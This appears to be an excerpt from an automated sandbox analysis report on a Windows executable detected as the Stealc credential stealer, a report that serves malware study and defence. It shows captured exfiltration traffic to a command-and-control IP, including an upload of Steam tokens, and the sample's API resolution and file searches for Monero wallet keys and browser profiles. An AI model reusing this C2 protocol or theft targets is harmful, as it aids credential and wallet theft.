72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED] Data Ascii: ------AKJDAEGCAFIIDGDGCGIJContent-Disposition: form-data; name="token"b726482f67cc532d4d607076621f78ad82e299bdff0f8d5c5d8677af6a6420540f330d10------AKJDAEGCAFIIDGDGCGIJContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------AKJDAEGCAFIIDGDGCGIJContent-Disposition: form-data; name="file"------AKJDAEGCAFIIDGDGCGIJ--
Oct 1, 2024 19:32:19.924213886 CEST	202	IN	HTTP/1.1 200 OK Date: Tue, 01 Oct 2024 17:32:19 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=81 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Oct 1, 2024 19:32:19.948086977 CEST	473	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----GHJDGDBFCBKFHJKFHCBK Host: 185.215.113.37 Content-Length: 272 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 47 48 4a 44 47 44 42 46 43 42 4b 46 48 4a 4b 46 48 43 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 37 32 36 34 38 32 66 36 37 63 63 35 33 32 64 34 64 36 30 37 30 37 36 36 32 31 66 37 38 61 64 38 32 65 32 39 39 62 64 66 66 30 66 38 64 35 63 35 64 38 36 37 37 61 66 36 61 36 34 32 30 35 34 30 66 33 33 30 64 31 30 0d 0a 2d 2d 2d 2d 2d 2d 47 48 4a 44 47 44 42 46 43 42 4b 46 48 4a 4b 46 48 43 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 79 62 6e 63 62 68 79 6c 65 70 6d 65 0d 0a 2d 2d 2d 2d 2d 2d 47 48 4a 44 47 44 42 46 43 42 4b 46 48 4a 4b 46 48 43 42 4b 2d 2d 0d 0a Data Ascii: ------GHJDGDBFCBKFHJKFHCBKContent-Disposition: form-data; name="token"b726482f67cc532d4d607076621f78ad82e299bdff0f8d5c5d8677af6a6420540f330d10------GHJDGDBFCBKFHJKFHCBKContent-Disposition: form-data; name="message"ybncbhylepme------GHJDGDBFCBKFHJKFHCBK--
Oct 1, 2024 19:32:20.171152115 CEST	1236	IN	HTTP/1.1 200 OK Date: Tue, 01 Oct 2024 17:32:20 GMT Server: Apache/2.4.52 (Ubuntu) Vary: Accept-Encoding Content-Length: 5733 Keep-Alive: timeout=5, max=80 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 2a 2e 70 6c 3c 62 72 3e 20 31 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 0a 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 0a 0a 3c 62 72 3e 2a 2e 61 72 3c 62 72 3e 20 31 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 0a 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 0a 0a 3c 62 72 3e 2a 2e 62 72 3c 62 72 3e 20 31 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 0a 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 0a 0a 3c 62 72 3e 2a 2e 65 63 3c 62 72 3e 20 31 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 0a 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 0a 0a 3c 62 72 3e 2a 2e 65 67 3c 62 72 3e 20 31 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 0a 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 0a 0a 3c 62 72 3e 2a 2e 69 6e 3c 62 72 3e 20 31 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 0a 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 0a 0a 3c 62 72 3e 2a 2e 70 74 3c 62 72 3e 20 31 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 0a 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 0a 0a 3c 62 72 3e 2a 2e 61 63 3c 62 72 3e 20 31 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 0a 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 0a 0a 3c 62 72 3e 2a 2e 62 64 3c 62 72 3e 20 31 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 0a 2e 67 6f 6f [TRUNCATED] Data Ascii: .pl<br> 1.google.com.google.com<br>.ar<br> 1.google.com.google.com<br>.br<br> 1.google.com.google.com<br>.ec<br> 1.google.com.google.com<br>.eg<br> 1.google.com.google.com<br>.in<br> 1.google.com.google.com<br>.pt<br> 1.google.com.google.com<br>.ac<br> 1.google.com.google.com<br>.bd<br> 1.google.com.google.com<br>.zm<br> 1.google.com.google.com<br>.ve<br> 1.google.com.google.com<br>.pk<br> 1.google.com.google.com<br>.rs<br> 1.google.com.google.com<br>.ph<br> 1.google.com.google.com<br>.mx<br> 1.google.com.google.com<br>.in<br> 1.google.com.google.com<br>.th<br> 1.google.com.google.com<br>.id<br> 1.google.com.google.com<br>.tr<br> 1.google.com.google.com<br>.cz<br> 1.google.com.google.com<br>.io<br> 1.google.com.google.com<br>.dz<br> 1.google.com.google.com<br>.de<br> 1.google.com.google.com<br>.kr<br> 1.google.com.google.com<br>.ma<br> 1.google.com.google.com<br>.jp<br> 1.google.com.google.com
Oct 1, 2024 19:32:20.173209906 CEST	473	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----EHJJECBKKECFIEBGCAKJ Host: 185.215.113.37 Content-Length: 272 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 45 48 4a 4a 45 43 42 4b 4b 45 43 46 49 45 42 47 43 41 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 37 32 36 34 38 32 66 36 37 63 63 35 33 32 64 34 64 36 30 37 30 37 36 36 32 31 66 37 38 61 64 38 32 65 32 39 39 62 64 66 66 30 66 38 64 35 63 35 64 38 36 37 37 61 66 36 61 36 34 32 30 35 34 30 66 33 33 30 64 31 30 0d 0a 2d 2d 2d 2d 2d 2d 45 48 4a 4a 45 43 42 4b 4b 45 43 46 49 45 42 47 43 41 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 6b 6b 6a 71 61 69 61 78 6b 68 62 0d 0a 2d 2d 2d 2d 2d 2d 45 48 4a 4a 45 43 42 4b 4b 45 43 46 49 45 42 47 43 41 4b 4a 2d 2d 0d 0a Data Ascii: ------EHJJECBKKECFIEBGCAKJContent-Disposition: form-data; name="token"b726482f67cc532d4d607076621f78ad82e299bdff0f8d5c5d8677af6a6420540f330d10------EHJJECBKKECFIEBGCAKJContent-Disposition: form-data; name="message"wkkjqaiaxkhb------EHJJECBKKECFIEBGCAKJ--
Oct 1, 2024 19:32:21.517445087 CEST	202	IN	HTTP/1.1 200 OK Date: Tue, 01 Oct 2024 17:32:20 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=79 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Oct 1, 2024 19:32:21.517812014 CEST	202	IN	HTTP/1.1 200 OK Date: Tue, 01 Oct 2024 17:32:20 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=79 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Oct 1, 2024 19:32:21.518009901 CEST	202	IN	HTTP/1.1 200 OK Date: Tue, 01 Oct 2024 17:32:20 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=79 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

Target ID:	0
Start time:	13:31:58
Start date:	01/10/2024
Path:	C:\Users\user\Desktop\file.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\file.exe"
Imagebase:	0x40000
File size:	1'884'672 bytes
MD5 hash:	DCD1D03F386DAB945A8B534DAC3D7622
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2266789162.0000000000CCE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2266052728.0000000000041000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.2038617483.0000000004A10000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2266789162.0000000000D45000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	5.2%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	10.8%
Total number of Nodes:	2000
Total number of Limit Nodes:	37

Executed Functions

Function 00059860 Relevance: 59.7, APIs: 33, Strings: 1, Instructions: 212
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcAddress.KERNEL32(75900000,00CE0420), ref: 000598A1
GetProcAddress.KERNEL32(75900000,00CE05D0), ref: 000598BA
GetProcAddress.KERNEL32(75900000,00CE05E8), ref: 000598D2
GetProcAddress.KERNEL32(75900000,00CE0438), ref: 000598EA
GetProcAddress.KERNEL32(75900000,00CE0648), ref: 00059903
GetProcAddress.KERNEL32(75900000,00CE89C0), ref: 0005991B
GetProcAddress.KERNEL32(75900000,00CD5CC8), ref: 00059933
GetProcAddress.KERNEL32(75900000,00CD5C28), ref: 0005994C
GetProcAddress.KERNEL32(75900000,00CE0600), ref: 00059964
GetProcAddress.KERNEL32(75900000,00CE0630), ref: 0005997C
GetProcAddress.KERNEL32(75900000,00CE03D8), ref: 00059995
GetProcAddress.KERNEL32(75900000,00CE0660), ref: 000599AD
GetProcAddress.KERNEL32(75900000,00CD5CE8), ref: 000599C5
GetProcAddress.KERNEL32(75900000,00CE06A8), ref: 000599DE
GetProcAddress.KERNEL32(75900000,00CE03F0), ref: 000599F6
GetProcAddress.KERNEL32(75900000,00CD5D08), ref: 00059A0E
GetProcAddress.KERNEL32(75900000,00CE0408), ref: 00059A27
GetProcAddress.KERNEL32(75900000,00CE06D8), ref: 00059A3F
GetProcAddress.KERNEL32(75900000,00CD5C88), ref: 00059A57
GetProcAddress.KERNEL32(75900000,00CE0780), ref: 00059A70
GetProcAddress.KERNEL32(75900000,00CD5D28), ref: 00059A88
LoadLibraryA.KERNEL32(00CE0738,?,00056A00), ref: 00059A9A
LoadLibraryA.KERNEL32(00CE06F0,?,00056A00), ref: 00059AAB
LoadLibraryA.KERNEL32(00CE0798,?,00056A00), ref: 00059ABD
LoadLibraryA.KERNEL32(00CE0708,?,00056A00), ref: 00059ACF
LoadLibraryA.KERNEL32(00CE0720,?,00056A00), ref: 00059AE0
GetProcAddress.KERNEL32(75070000,00CE0750), ref: 00059B02
GetProcAddress.KERNEL32(75FD0000,00CE0768), ref: 00059B23
GetProcAddress.KERNEL32(75FD0000,00CE8D00), ref: 00059B3B
GetProcAddress.KERNEL32(75A50000,00CE8BE0), ref: 00059B5D
GetProcAddress.KERNEL32(74E50000,00CD5D68), ref: 00059B7E
GetProcAddress.KERNEL32(76E80000,00CE89D0), ref: 00059B9F
GetProcAddress.KERNEL32(76E80000,NtQueryInformationProcess), ref: 00059BB6

Strings

NtQueryInformationProcess, xrefs: 00059BAA

Memory Dump Source

Source File: 00000000.00000002.2266052728.0000000000041000.00000040.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true

Associated: 00000000.00000002.2266034440.0000000000040000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000009A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.0000000000122000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000012F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000014F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000015B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000015E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000001E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.0000000000205000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000020B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000029E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000042D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.0000000000513000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.0000000000535000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000054C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266535420.000000000054D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266630055.00000000006F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266642633.00000000006F3000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40000_file.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID: NtQueryInformationProcess
API String ID: 2238633743-2781105232
Opcode ID: 719d8391851f92b9226edd6654b81898df1ac40dd53bb9e9cd29b193e36a5853
Instruction ID: 8493e69e38d97c048fbe241dc0bc81a579ca0bd6c82ebbf8b02a9cf01c881754
Opcode Fuzzy Hash: 719d8391851f92b9226edd6654b81898df1ac40dd53bb9e9cd29b193e36a5853
Instruction Fuzzy Hash: F2A13ABD5032409FF344EFA8FD8C95AB7F9F748701704451BA60997268DF39A852EB22

Function 000445C0 Relevance: 56.1, APIs: 2, Strings: 30, Instructions: 148
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(00000000), ref: 0004460F
VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 0004479C

Strings

The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 000445F3
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 000445C7
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0004475A
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00044678
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0004473F
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 000446C2
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00044622
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00044657
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00044734
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0004466D
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00044683
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0004474F
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 000446AC
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 000445E8
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 000446B7
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00044713
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0004477B
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0004471E
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 000446D8
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00044638
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 000446CD
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 000445DD
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0004462D
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00044643
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00044662
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00044765
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00044770
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00044617
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00044729
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 000445D2

Memory Dump Source

Source File: 00000000.00000002.2266052728.0000000000041000.00000040.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true

Associated: 00000000.00000002.2266034440.0000000000040000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000009A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.0000000000122000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000012F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000014F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000015B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000015E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000001E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.0000000000205000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000020B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000029E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000042D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.0000000000513000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.0000000000535000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000054C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266535420.000000000054D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266630055.00000000006F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266642633.00000000006F3000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40000_file.jbxd

Yara matches

Similarity

API ID: AllocateHeapProtectVirtual
String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
API String ID: 1542196881-2218711628
Opcode ID: 9928e770c24ef9a4776c6a2633629135e7487c00d4f17a3b414d58b2eec17e8d
Instruction ID: 0cf1ac5a3eead22344403e1dbf8af703922870341369c49499d25b046bc98b9e
Opcode Fuzzy Hash: 9928e770c24ef9a4776c6a2633629135e7487c00d4f17a3b414d58b2eec17e8d
Instruction Fuzzy Hash: 76413C646C97047BEE7CBFA48C42F9D7397DF427C9F4050E0AE205A280CBB0A9244DA6

Function 0004BE70 Relevance: 37.4, APIs: 17, Strings: 4, Instructions: 675
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0005A740: lstrcpy.KERNEL32(00060E17,00000000), ref: 0005A788

Part of subcall function 0005A920: lstrcpy.KERNEL32(00000000,?), ref: 0005A972
Part of subcall function 0005A920: lstrcat.KERNEL32(00000000), ref: 0005A982

Part of subcall function 0005A9B0: lstrlen.KERNEL32(?,00CE8690,?,\Monero\wallet.keys,00060E17), ref: 0005A9C5
Part of subcall function 0005A9B0: lstrcpy.KERNEL32(00000000), ref: 0005AA04
Part of subcall function 0005A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0005AA12

Part of subcall function 0005A8A0: lstrcpy.KERNEL32(?,00060E17), ref: 0005A905

FindFirstFileA.KERNEL32(00000000,?,00060B32,00060B2B,00000000,?,?,?,000613F4,00060B2A), ref: 0004BEF5
StrCmpCA.SHLWAPI(?,000613F8), ref: 0004BF4D
StrCmpCA.SHLWAPI(?,000613FC), ref: 0004BF63
FindNextFileA.KERNELBASE(000000FF,?), ref: 0004C7BF
FindClose.KERNEL32(000000FF), ref: 0004C7D1

Strings

Google Chrome, xrefs: 0004C634
Brave, xrefs: 0004C102
Preferences, xrefs: 0004C11E
\Brave\Preferences, xrefs: 0004C1DB

Memory Dump Source

Source File: 00000000.00000002.2266052728.0000000000041000.00000040.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true

Associated: 00000000.00000002.2266034440.0000000000040000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000009A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.0000000000122000.00000040.00000001.01000000.00000003.sdmpDownload File
